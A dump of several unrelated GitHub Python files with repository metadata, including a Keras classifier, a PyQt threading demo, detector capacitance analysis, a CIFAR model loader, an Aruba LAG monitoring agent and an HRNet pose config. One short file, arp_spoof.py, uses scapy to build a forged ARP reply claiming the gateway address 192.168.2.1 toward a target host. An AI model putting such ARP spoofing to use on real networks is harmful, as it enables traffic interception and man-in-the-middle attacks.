| 2020-11-28T22:48:05
| 316,822,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,148
|
py
|
# -*- coding: utf-8 -*-
import tensorflow as tf
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
import keras
from keras.models import Sequential
from keras.layers import Dense
from sklearn.model_selection import train_test_split
def get_metrics(y, y_pred):
tp,tn,fp,fn = 0,0,0,0
for i in range(len(y)):
if y[i] == 1 and y_pred[i] == 1:
tp = tp + 1
elif y[i] == 1 and y_pred[i] == 0:
fn = fn + 1
elif y[i] == 0 and y_pred[i] == 1:
fp = fp + 1
else:
tn = tn + 1
sen = tp / (fn + tp)
spec = tn / (tn + fp)
acc = (tp + tn) / len(y)
return acc, sen, spec
# import data
df = pd.read_csv('Social_Network_Ads.csv')
X = df.iloc[:, :-1].values
y = df.iloc[:, -1].values
# split train test
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)
# feature scaling
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# ANN
classifier = Sequential()
# input layer
classifier.add(Dense(6, init = 'uniform', input_dim = len(X_train[0]), activation = 'relu'))
# hidden layer
classifier.add(Dense(8, init = 'uniform', activation = 'relu'))
# output layer
classifier.add(Dense(1, activation = 'sigmoid'))
# compile ann
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
classifier.fit(X_train, y_train, batch_size = 5, epochs = 100)
# predict
y_predtr = classifier.predict(X_train)
y_predte = classifier.predict(X_test)
y_predtr = np.round(y_predtr)
y_predte = np.round(y_predte)
acc_train, sen_train, spec_train = get_metrics(y_train, y_predtr)
acc_test, sen_test, spec_test = get_metrics(y_test, y_predte)
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_predte)
print("\nTrain Accuracy: ", acc_train)
print("Train Sensitivity: ", sen_train)
print("Train Specificity: ", spec_train)
print("\nTest Accuracy: ", acc_test)
print("Test Sensitivity: ", sen_test)
print("Test Specificity: ", spec_test)
|
[
"noreply@github.com"
] |
kennethng555.noreply@github.com
|
ea2c6ab46d0624a5e7a2f87f5ac7640169f8fe13
|
ca2f18ee97d16afe450b1ed193006757779d0ac6
|
/多线程处理/main2.py
|
ee08cb0e518c5a48e2fe749fed0e25aa1005ca93
|
[] |
no_license
|
penpen456/pyqt5_test
|
db6cc8e1ad058d7caeb2df73b05c255a7a1ba115
|
57c8273ebef77988c6637cdc93440a6f500553ac
|
refs/heads/master
| 2020-06-29T09:56:48.249971
| 2020-01-13T10:26:33
| 2020-01-13T10:26:33
| 200,505,334
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 855
|
py
|
import sys
import time
import threading
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.QtCore import QThread, pyqtSignal
from usetimesleep import Ui_MainWindow
class MyWindow(QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
super().__init__(parent)
self.setupUi(self)
self.t = MyThread()
self.pushButton.clicked.connect(self.start)
self.t.signal.connect(self.printt)
def start(self):
self.t.start()
def printt(self, a):
self.textEdit.setText(a)
class MyThread(QThread):
signal = pyqtSignal(str)
def __init__(self):
super().__init__()
def run(self):
time.sleep(6)
self.signal.emit('123')
if __name__ == "__main__":
app = QApplication(sys.argv)
main = MyWindow()
main.show()
sys.exit(app.exec_())
|
[
"1553821308@qq.com"
] |
1553821308@qq.com
|
689fb824309a4ab2169c0a15a96b15566519b11e
|
9c436a0361e265f22f3221d93c33340255cb1bda
|
/Medclapp_Final/Admin_Section/apps.py
|
e2a828de7ededa191f386872845b2a2393f5b3e9
|
[] |
no_license
|
suryarajps/medclappCustomerAPI
|
b6787f339a2b996817193c093809c0d96b4e0fcf
|
ad1e92e36aa76651cb941a5f0a3d015b5464d5fd
|
refs/heads/main
| 2023-02-28T04:47:18.396500
| 2021-02-09T04:02:31
| 2021-02-09T04:02:31
| 336,484,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 100
|
py
|
from django.apps import AppConfig
class AdminSectionConfig(AppConfig):
name = 'Admin_Section'
|
[
"surya@vozinno.com"
] |
surya@vozinno.com
|
c0c140eb3a317927b21bec466849ee3c444182a8
|
7e1c2b653b8e91228579015d15266116fd2d5c12
|
/CV_analysis.py
|
90ac02d69fbfabc299947a5298926b08b07d1c10
|
[] |
no_license
|
Eloviyo/Semiconductor-detector-lab-analysis
|
f1e7505c305ee1e02c43017fa91711c13afcf518
|
bf165ac68f5f3e30d330c58a451b530ddf98c03d
|
refs/heads/master
| 2022-04-24T04:34:31.601928
| 2020-04-27T22:39:22
| 2020-04-27T22:39:22
| 259,122,271
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,230
|
py
|
'''This code plots the CV measurement figures from files located in the 'data' folder'''
__author__ = "Shirajum Monira"
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import numpy as np
import math
import glob
def straight_lines(x,a,b): #defines straight line
first = a*x + b
return first
file = sorted(glob.glob('*.txt')) #returns an unsorted list of all files with .txt extension
#guess values for the straight line fitting
guess1 = (0.00015,0.012)
guess2 = (0.0006,0)
guess3 = (-0.000183,0.011)
guess4 = (-0.000275,0)
#dictionary with keys as index value of file list. The keys contain guess values of particular files and voltage values to calculate range of each straight line
file_dictionary = {
0:(guess1,guess2,25,18),
2:(guess1,guess2,25,18),
4:(guess3,guess4,-40,-30),
}
for index in [0,2,4]:
data_needle = np.loadtxt(file[index],skiprows=1) #data from closed needle files
data_open_needle = np.loadtxt(file[index+1],skiprows=1) #data from open needle files
source_voltage = data_needle[:,0] #reads column source voltage
#subtracts baseline from main data and calculates the true capacitances in pF
true_capacitance1 = (data_needle[:,1]-data_open_needle[:,1])*1e12
true_capacitance2 = (data_needle[:,3]-data_open_needle[:,3])*1e12
true_capacitance3 = (data_needle[:,5]-data_open_needle[:,5])*1e12
#print(true_capacitance1[0],true_capacitance2[0],true_capacitance3[0])
print('You are now looking at file -- ',file[index])
plt.figure()
#plotting 1/c^2 vs source voltage
plt.plot(source_voltage,1/(true_capacitance1)**2)
plt.plot(source_voltage,1/(true_capacitance2)**2)
plt.plot(source_voltage,1/(true_capacitance3)**2)
plt.suptitle('Detector True Capacitance vs. Bias Voltage')
plt.xlabel('Bias Voltage (V)')
plt.ylabel('Capacitance$^{-2}$ in (pF$^{-2}$)')
#creates mask with voltage values in absolute forms to fix range of each straight line
v1_index = np.argmax(np.abs(source_voltage) > np.abs(file_dictionary[index][2]))
v2_index = np.argmax(np.abs(source_voltage) > np.abs(file_dictionary[index][3]))
#using mask to generate range for line fitting later
new_source_voltage1 = source_voltage[v1_index:]
new_source_voltage2 = source_voltage[:v2_index]
new_source_voltage3 = source_voltage[:v1_index]
new_capacitance1 = true_capacitance1[v1_index:]
new_capacitance2 = true_capacitance1[:v2_index]
#fits first straight line
g1,cov = curve_fit(straight_lines,new_source_voltage1,1/(new_capacitance1)**2,file_dictionary[index][0])
plt.plot(source_voltage,straight_lines(source_voltage,g1[0],g1[1]))
#fits second straight line
g2,cov = curve_fit(straight_lines,new_source_voltage2,1/(new_capacitance2)**2,file_dictionary[index][1])
plt.plot(new_source_voltage3,straight_lines(new_source_voltage3,g2[0],g2[1]))
#calculating depletion voltage by equating the straight lines at the intersection point
depletion_voltage = (g2[1]-g1[1])/(g1[0]-g2[0])
plt.axvline(depletion_voltage) #drops a vertical line from intersection to the X-axis
print('The full depletion voltage calculated is =',depletion_voltage)
plt.savefig('figure3.pdf', bbox_inches = 'tight')
plt.show()
|
[
"shirajum.monira@helsinki.fi"
] |
shirajum.monira@helsinki.fi
|
6e0adea63df3926229b270673ba36e756fba28fd
|
a2e58b24f99191c209a5c5dfdc94ca44612e11af
|
/objective_func/tf_models/setup_cifar.py
|
999ae910edf867e43688c29898654642d2301bd7
|
[
"MIT"
] |
permissive
|
happyxzw/BayesOpt_Attack
|
a74d624c89fe2cb0d1dcb9435c769a197086cb3d
|
cec6c4dfede2f3492d1e5cb8dd4cdacee4059f33
|
refs/heads/master
| 2022-10-19T08:55:51.653820
| 2020-06-14T05:14:46
| 2020-06-14T05:14:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,044
|
py
|
## setup_cifar.py -- cifar data and model loading code
##
## Copyright (C) 2016, Nicholas Carlini <nicholas@carlini.com>.
##
## Original copyright license follows.
import tensorflow as tf
import numpy as np
import os
import pickle
import gzip
import pickle
import urllib.request
from tensorflow.contrib.keras.api.keras.models import Sequential
from tensorflow.contrib.keras.api.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.contrib.keras.api.keras.layers import Conv2D, MaxPooling2D
from tensorflow.contrib.keras.api.keras.models import load_model
def load_batch(fpath, label_key='labels'):
f = open(fpath, 'rb')
d = pickle.load(f, encoding="bytes")
for k, v in d.items():
del(d[k])
d[k.decode("utf8")] = v
f.close()
data = d["data"]
labels = d[label_key]
data = data.reshape(data.shape[0], 3, 32, 32)
final = np.zeros((data.shape[0], 32, 32, 3),dtype=np.float32)
final[:,:,:,0] = data[:,0,:,:]
final[:,:,:,1] = data[:,1,:,:]
final[:,:,:,2] = data[:,2,:,:]
final /= 255
final -= .5
labels2 = np.zeros((len(labels), 10))
labels2[np.arange(len(labels2)), labels] = 1
return final, labels
def load_batch(fpath):
f = open(fpath,"rb").read()
size = 32*32*3+1
labels = []
images = []
for i in range(10000):
arr = np.fromstring(f[i*size:(i+1)*size],dtype=np.uint8)
lab = np.identity(10)[arr[0]]
img = arr[1:].reshape((3,32,32)).transpose((1,2,0))
labels.append(lab)
images.append((img/255)-.5)
return np.array(images),np.array(labels)
class CIFAR:
# 78% accuracy
def __init__(self, folder_path=None):
train_data = []
train_labels = []
if not os.path.exists(f"{folder_path}cifar-10-batches-bin"):
urllib.request.urlretrieve("https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"cifar-data.tar.gz")
os.popen(f"tar -xzf cifar-data.tar.gz").read()
for i in range(5):
r,s = load_batch(f"{folder_path}cifar-10-batches-bin/data_batch_"+str(i+1)+".bin")
train_data.extend(r)
train_labels.extend(s)
train_data = np.array(train_data,dtype=np.float32)
train_labels = np.array(train_labels)
self.test_data, self.test_labels = load_batch(f"{folder_path}cifar-10-batches-bin/test_batch.bin")
VALIDATION_SIZE = 5000
self.validation_data = train_data[:VALIDATION_SIZE, :, :, :]
self.validation_labels = train_labels[:VALIDATION_SIZE]
self.train_data = train_data[VALIDATION_SIZE:, :, :, :]
self.train_labels = train_labels[VALIDATION_SIZE:]
class CIFARModel:
def __init__(self, restore=None, session=None, use_softmax=False):
self.num_channels = 3
self.image_size = 32
self.num_labels = 10
# restore = '/data/engs-bayesian-machine-learning/sedm4615/TF_BO_Black-box_Attack/objective_func/cifar'
model = Sequential()
model.add(Conv2D(64, (3, 3),
input_shape=(32, 32, 3)))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (3, 3)))
model.add(Activation('relu'))
model.add(Conv2D(128, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(256))
model.add(Activation('relu'))
model.add(Dense(256))
model.add(Activation('relu'))
model.add(Dense(10))
if use_softmax:
model.add(Activation('softmax'))
if restore:
model.load_weights(restore)
self.model = model
def predict(self, data):
return self.model(data)
if __name__ == '__main__':
CIFAR(folder_path='./')
|
[
"robin@robots.ox.ac.uk"
] |
robin@robots.ox.ac.uk
|
1711c46f73e2f5cfe6d3138100ac46ed49c83bdc
|
22672390a8040077200f766ac3ad0bb11d78b5b3
|
/stuff/arp_spoof.py
|
4ccd3752524cff0f62d2d007c4c57e22b12b77ed
|
[] |
no_license
|
shadowsax/NetworkOpen
|
2f469dfdf43b5f2ee039566a24c56973a6027a5a
|
a44bd6bf88cab9880ec2df5eaec8d3e3d7173be3
|
refs/heads/master
| 2020-05-04T19:29:29.107654
| 2019-04-04T20:50:34
| 2019-04-04T20:50:34
| 179,396,111
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 122
|
py
|
import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="192.168.2.173", hwdst="80:d6:05:1d:3f:6d", psrc="192.168.2.1")
|
[
"shadowsax@protonmail.com"
] |
shadowsax@protonmail.com
|
dfefa586f24a0d17af8b85ac68f93b93cde62f5b
|
cec57a923feaea6de6750dab0e76fbdca6ee7349
|
/forelse.py
|
d53a4809d5424f3fa970ce970b325529b85df41d
|
[] |
no_license
|
FlorentRu/Python-Programming-Developement-
|
ba712ea19bb572fb0490c247898a76e38442b57e
|
039c8942d92fbca5927ebc812c1d634bac18f35e
|
refs/heads/master
| 2021-06-27T09:07:48.073928
| 2020-11-17T00:44:42
| 2020-11-17T00:44:42
| 186,523,079
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
for num in range(10,20): #to iterate between 10 to 20
for i in range(2,num): #to iterate on the factors of the number
if num%i == 0: #to determine the first factor
j=num/i #to calculate the second factor
print ('%d equals %d * %d' % (num,i,j))
break #to move to the next number, the #first FOR
else: # else part of the loop
print(num, 'is a prime number')
|
[
"noreply@github.com"
] |
FlorentRu.noreply@github.com
|
0e0d5fc4dc4af295ea7ee55998e88442fbf2274f
|
8c4b11d129754f4b792862abfc451f2fb598bdac
|
/2week.py
|
3567ec6587d5e3c1f339111d8a3c409046343013
|
[] |
no_license
|
cpti372/Python
|
2b523ba655d6cf8819c1302c34c9057934313df4
|
5dffaf441e1c1620746806ea4122b4fd89b2ee99
|
refs/heads/master
| 2023-01-24T02:51:53.802184
| 2020-11-18T06:23:07
| 2020-11-18T06:23:07
| 144,700,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,651
|
py
|
#107
myTup=(1,2,3)
print(myTup)
myTup=('this is tuple',23.21,(1,2,3))
print(myTup)
myTup='소괄호 없이도 튜플',1.22,'을 만들수 잇음'
print(myTup)
memoryview
#108
my=('a','b','c','d')
print(my)
print(my[1])
Tu_1=(1,2,3)
print(Tu_1*2)
Tu_2=(10,20,[1,2,3])
Tu_2[2][1]=4
print(Tu_2)
#109
Tu_3=(1,2,3,4,5,6,7,8,9,10)
tot=0
for i in Tu_3:
tot+=i
print(tot)
#110
myTup2=('kim','lee','oark','choid')
print(myTup2)
print(sorted(myTup2))
print(myTup2+('oh','i'))
print(myTup2)
print(type(myTup2))
#111
a=(10,20,30,20,30,40)
print(a.index(10),a.index(20),a.index(30))
print(a.count(20),a.count(30),a.count(40))
print(10 in a)
b=tuple(i for i in range(10) if i%2==0)
print(b)
#112
x={'a':10,'b':20,'c':30}
print('초기상태:',x)
x['d']=40
print('d추가:',x)
x['b']=40
print('b 수정:',x)
del(x['c'])
print(x)
x['a']=20
print(x)
#113
list1=[['a','b'],['c','d']]
print(dict(list1))
list2=['12','34','56']
print(dict(list2))
#114
ht={'chenle':178,'jisung':180}
print(ht.get('chenle'))
ht['jeno']=176
print(ht)
a=ht.pop('jeno') #키 값을 삭제
print(a,ht)
ht['robin']=146
b=ht.popitem()
print(b,ht)
nht={'jaemin':175,'renjun':174}
ht.update(nht)#딕셔널 데이터를 더하여 갱신
print(ht)
print(ht.keys())#사전의 키들을 리턴
print(ht.values())#사전의 값들을 리턴
print(ht.items())#키와 값을 리턴
#115
chenle={'ht':'178cm','age':21,'birth':'11월','group':'nctdream'}
print('chenle','is',chenle.get('ht'))
print('chenle belongs to',chenle.get('group'))
#116
chenle={'korean':100,'English':98,'math':98,'science':98}
average=(chenle['korean']+chenle['math'])
print(average)
#118
nct={'chenle':'vocal','js':'dance','mark':'leader'}
var=list(nct.keys())[0]
result=nct[var]
input('nct 이름:')
print('{}is {} player'.format(var,result))
#119
chengji={'won':50,'hoo':60,'su':100}
average=(sum(chengji.values())/len(chengji))
print(average)
#120
myset={1,2,3}
print(myset)
print(type(myset))
myset={'ice',1.2,(1,3,5)}
print(myset)
myset={1,2,3,2,3,2,2}
print(myset)
#121
a={1,2,3,5,6,8}
b={1,3,4,5,6,7}
print(a.union(b))
print(a.intersection(b))
print(a.difference(b))
print(a.symmetric_difference(b))#두 셋의 비 공통요소
#122
myset={1,3,5}
print(myset)
myset.add('A')
print(myset)
myset.update({1,3},[2,3])
print(myset)#{1,2,3,5,'A'}
print()
print(myset.pop())
print(myset)
myset={'apple','melon','strawberry','grape'}
print(myset)
print()
myset.discard('apple')
print(myset)
myset.remove('grape')
print(myset)
#123
A={10,20,70,90}
print({10,20,70,80,90}.issuperset(A)) #앞에게 두에 요소 하나라도 가지고 있니
print({20,30,50}<=A) #앞에꺼에 속한 요소가 뒤에꺼보다 작은지
#124
animals={'cat','dog'}
print('cat'in animals)
print('fish' in animals)
animals.add('fish')
print(len(animals))
animals.add('cat')
print(len(animals))
#125
myset=set([1,2,3,4,5])
print(myset)
myset.update({7,11,'Ferran'})
myset.remove(1)
print(myset)
#126
A={1,3,4,6}
B={2,3,5,6}
print(A^B)
print(A|B)
print((A^B)|(A&B))
print(A<={1,3,4,5,6})
#126
a={1,2,4,8,16}
b={1,2,15,3,10,5,6,30}
print(a&b)
#128
num=list((input().split(' ')))
for i in range(len(num)):
num[i]=int(num[i])
max_num=max(num)
print(max_num)
#129
a=['aloha','b','cdfdfdfd','defee','edfdfdf','fffff','ggggg','hhh','e']
b=[]
for i in a:
if(len(i)==5):
b.append(i)
print(b)
#130
list1=['a','c','d','b','e']
print(list1)
l=sorted(list1)
print(list(reversed(l)))
#131
a={'math':76,'science':89,'eng':93}
b={'math':88,'science':87,'eng':100}
c={'math':86,'science':93,'eng':82}
av_1=(sum(a.values())/len(a))
av_2=(sum(b.values())/len(b))
av_3=(sum(c.values())/len(c))
print(av_1,int(av_2),av_3)
|
[
"noreply@github.com"
] |
cpti372.noreply@github.com
|
7f7882026eb8f9eccdacaed98be5b29d94c8538c
|
6a61ebf5eaa7731384faf62b804b715ea9f6d594
|
/conditional_statements_the_challenge.py
|
4764d2a073b9d3e981e3afb92741a8ccf2b556bf
|
[] |
no_license
|
neonblueflame/wwcode-python
|
1afb3532fa9cdbf4a3984aa558c85abee99c808c
|
301789bff003c3e29b8280a3041b39e8b934e3d8
|
refs/heads/master
| 2020-06-28T03:37:39.801791
| 2019-08-14T11:14:28
| 2019-08-14T11:14:28
| 200,133,757
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
""" Challenge
Author:
Description: Aling Nena stores her soft drink stock on two refrigerators.
She stores Coke, Sprite and Royal on her Sari-sari store's refrigerator while
RC and 7UP can be found on her house's refrigerator.
Help Aling Nena to properly respond to her customer
when buying softdrinks.
The reply will depend if the soft drink brand is on the store's ref,
on the house's ref or none. If the customer buys a soft drink brand that is:
1. stored on the store, she will respond 'Got it!'
2. stored on the house, she will respond 'Please wait for a while!'
3. not sold by her, she will respond 'Sorry we do not sell that. We only
have <input here the soft drink brands>'
"""
ref_house = ["rc", "7up"]
ref_store = ["coke", "sprite", "royal"]
customer_order = input("Hi! What soft drink brand do you want? ")
if customer_order.lower() in ref_store:
print("Got it!")
elif customer_order.lower() in ref_house:
print("Please wait for a while!")
else:
print("Sorry we do not sell that. We only have "
+ ", ".join(ref_house).upper()
+ ", "
+ ", ".join(ref_store).title()
+ ".")
|
[
"4207002+neonblueflame@users.noreply.github.com"
] |
4207002+neonblueflame@users.noreply.github.com
|
fce993d8920b28df3ac58d79bdd0e33f3a657784
|
38038eef797c36cfc5a1a8514f7befbf0258a6b3
|
/agents/LAG/8400/lag_health_monitor.2.0.py
|
ccdbfc955b156801e7817cb7f7ac4c206da1f144
|
[
"Apache-2.0"
] |
permissive
|
nishanthprakash-hpe/nae-scripts
|
7dcb20c44cfa600fc55918d27345a26c7af0c553
|
bf14e5155308683d59e7a95d21436a767d9132a8
|
refs/heads/master
| 2020-03-23T20:40:14.851409
| 2018-07-24T02:07:14
| 2018-07-24T02:07:14
| 142,054,671
| 0
| 0
|
Apache-2.0
| 2018-07-23T18:40:13
| 2018-07-23T18:40:12
| null |
UTF-8
|
Python
| false
| false
| 7,953
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
Manifest = {
'Name': 'lag_health_monitor',
'Description': 'LAG status monitoring agent using PSPO',
'Version': '2.0',
'Author': 'Aruba Networks'
}
ParameterDefinitions = {
'lag_name_1': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
},
'lag_name_2': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
},
'lag_name_3': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
},
'lag_name_4': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
},
'lag_name_5': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
},
'lag_name_6': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
},
'lag_name_7': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
},
'lag_name_8': {
'Name': 'Name of the LAG to be monitored',
'Description': 'Name of the LAG for which status is to be monitored',
'Type': 'string',
'Default': ''
}
}
class Agent(NAE):
def __init__(self):
# Critical lag(s) list.
self.variables['critical_lags'] = ''
# forwarding_state.forwarding var.
self.variables['forwarding'] = ''
# forwarding_state.blocking_layer var.
self.variables['blocked_by_aggregation'] = ''
self.setup_lag_status_monitors()
def setup_lag_status_monitors(self):
for i in range(1, 8):
lag_var = 'lag_name_' + str(i)
lag_value = self.params[lag_var].value
if lag_value:
lag_fwd_var = 'lag_fwd' + str(i)
uri1 = '/rest/v1/system/ports/{}?' \
'attributes=forwarding_state.forwarding'
lag_fwd_monitor = Monitor(
uri1,
'LAG Forwarding State',
[self.params[lag_var]])
setattr(self, lag_fwd_var, lag_fwd_monitor)
lag_rule_var_1 = 'lag_rule_1' + str(i)
lag_rule_1 = Rule('Port Forwarding is false')
lag_rule_1.condition(
'transition {} from "true" to "false"',
[lag_fwd_monitor])
lag_rule_1.action(self.status_transition_action)
setattr(self, lag_rule_var_1, lag_rule_1)
lag_rule_var_2 = 'lag_rule_2' + str(i)
lag_rule_2 = Rule('Port Forwarding is back to normal')
lag_rule_2.condition(
'transition {} from "false" to "true"',
[lag_fwd_monitor])
lag_rule_2.action(self.status_transition_action)
setattr(self, lag_rule_var_2, lag_rule_2)
lag_blk_var = 'lag_blk' + str(i)
uri3 = '/rest/v1/system/ports/{}?' \
'attributes=forwarding_state.blocking_layer'
lag_blk_monitor = Monitor(
uri3,
'Port Blocking Layer',
[self.params[lag_var]])
setattr(self, lag_blk_var, lag_blk_monitor)
lag_rule_var_3 = 'lag_rule_3' + str(i)
lag_rule_3 = Rule(
'Forwarding state is blocked by AGGREGATION layer')
lag_rule_3.condition('{} == "AGGREGATION"', [lag_blk_monitor])
lag_rule_3.action(self.blocking_layer_action)
setattr(self, lag_rule_var_3, lag_rule_3)
lag_rule_var_4 = 'lag_rule_4' + str(i)
lag_rule_4 = Rule(
'Forwarding state is not blocked by AGGREGATION layer')
lag_rule_4.condition('{} != "AGGREGATION"', [lag_blk_monitor])
lag_rule_4.action(self.blocking_layer_normal)
setattr(self, lag_rule_var_4, lag_rule_4)
def status_transition_action(self, event):
lag_data = event['labels']
lag_data = lag_data.split(",")[0]
_, lag_id = lag_data.split("=")
event_data = event['value']
self.logger.info(event['value'])
self.variables['forwarding'] = str(event_data)
self.logger.info("forwarding:" + str(self.variables['forwarding']))
self.report_alert_status(lag_id)
def blocking_layer_action(self, event):
lag_data = event['labels']
lag_data = lag_data.split(",")[0]
_, lag_id = lag_data.split("=")
self.variables['blocked_by_aggregation'] = 'true'
self.logger.info(
"Blocking layer:" + str(self.variables['blocked_by_aggregation']))
self.report_alert_status(lag_id)
def blocking_layer_normal(self, event):
lag_data = event['labels']
lag_data = lag_data.split(",")[0]
_, lag_id = lag_data.split("=")
self.variables['blocked_by_aggregation'] = 'false'
self.report_alert_status(lag_id)
def report_alert_status(self, lag_id):
if (self.variables['forwarding'] == 'false') and \
(self.variables['blocked_by_aggregation'] == 'true'):
self.update_alert_level(AlertLevel=AlertLevel.CRITICAL)
if lag_id not in self.variables['critical_lags']:
critical_lag_list = self.variables['critical_lags']
# Adding lag_id to critical lag(s) list.
self.variables['critical_lags'] = critical_lag_list + lag_id
self.logger.debug(str(self.variables['critical_lags']))
ActionSyslog('%s is down' % (lag_id))
ActionCLI('show lacp aggregates %s' % (lag_id))
else:
if lag_id in self.variables['critical_lags']:
critical_lag_list = self.variables['critical_lags']
# Removing lag_id from critical lag(s) list.
critical_lag_list = critical_lag_list.replace(lag_id, '')
self.variables['critical_lags'] = critical_lag_list
self.logger.debug(
'Unset the previous status for lag id' + lag_id)
ActionSyslog('%s is up' % (lag_id))
self.logger.debug(self.variables['critical_lags'])
if not self.variables['critical_lags']:
self.update_alert_level(AlertLevel=AlertLevel.NONE)
def update_alert_level(self, AlertLevel):
if self.get_alert_level() is not AlertLevel:
self.set_alert_level(AlertLevel)
self.logger.debug('CURRENT ALERT LEVEL:' +
str(self.get_alert_level()))
|
[
"nishanth.prakash@hpe.com"
] |
nishanth.prakash@hpe.com
|
27c3f2d7d17692197f2710282816e3a9c39e727d
|
1082cee55e32fa76859666aa011428bf979182ea
|
/pose/configs/animal/hrnet/horse10/hrnet_w32_horse10_256x256-split2.py
|
5de3a1afca5c8fe0426d03c24c6ee4857fc01faf
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
cvsch/HRFormer
|
f7a96d8620f87986cf10c74fe4f47d5b7106d732
|
9e6ce958ba502354dff748846d6d98f682f5f9d1
|
refs/heads/main
| 2023-08-20T21:29:51.448485
| 2021-10-19T01:20:02
| 2021-10-19T01:20:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,689
|
py
|
log_level = 'INFO'
load_from = None
resume_from = None
dist_params = dict(backend='nccl')
workflow = [('train', 1)]
checkpoint_config = dict(interval=5, create_symlink=False)
evaluation = dict(interval=10, metric='PCK', key_indicator='PCK')
optimizer = dict(
type='Adam',
lr=5e-4,
)
optimizer_config = dict(grad_clip=None)
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.001,
step=[170, 200])
total_epochs = 210
log_config = dict(
interval=1,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
channel_cfg = dict(
num_output_channels=22,
dataset_joints=22,
dataset_channel=[
[
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
19, 21
],
],
inference_channel=[
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
21
])
# model settings
model = dict(
type='TopDown',
pretrained='https://download.openmmlab.com/mmpose/'
'pretrain_models/hrnet_w32-36af842e.pth',
backbone=dict(
type='HRNet',
in_channels=3,
extra=dict(
stage1=dict(
num_modules=1,
num_branches=1,
block='BOTTLENECK',
num_blocks=(4, ),
num_channels=(64, )),
stage2=dict(
num_modules=1,
num_branches=2,
block='BASIC',
num_blocks=(4, 4),
num_channels=(32, 64)),
stage3=dict(
num_modules=4,
num_branches=3,
block='BASIC',
num_blocks=(4, 4, 4),
num_channels=(32, 64, 128)),
stage4=dict(
num_modules=3,
num_branches=4,
block='BASIC',
num_blocks=(4, 4, 4, 4),
num_channels=(32, 64, 128, 256))),
),
keypoint_head=dict(
type='TopDownSimpleHead',
in_channels=32,
out_channels=channel_cfg['num_output_channels'],
num_deconv_layers=0,
extra=dict(final_conv_kernel=1, ),
loss_keypoint=dict(type='JointsMSELoss', use_target_weight=True)),
train_cfg=dict(),
test_cfg=dict(
flip_test=True,
post_process='default',
shift_heatmap=True,
modulate_kernel=11))
data_cfg = dict(
image_size=[256, 256],
heatmap_size=[64, 64],
num_output_channels=channel_cfg['num_output_channels'],
num_joints=channel_cfg['dataset_joints'],
dataset_channel=channel_cfg['dataset_channel'],
inference_channel=channel_cfg['inference_channel'])
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='TopDownRandomFlip', flip_prob=0.5),
dict(
type='TopDownGetRandomScaleRotation', rot_factor=40, scale_factor=0.5),
dict(type='TopDownAffine'),
dict(type='ToTensor'),
dict(
type='NormalizeTensor',
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
dict(type='TopDownGenerateTarget', sigma=2),
dict(
type='Collect',
keys=['img', 'target', 'target_weight'],
meta_keys=[
'image_file', 'joints_3d', 'joints_3d_visible', 'center', 'scale',
'rotation', 'bbox_score', 'flip_pairs'
]),
]
val_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='TopDownAffine'),
dict(type='ToTensor'),
dict(
type='NormalizeTensor',
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
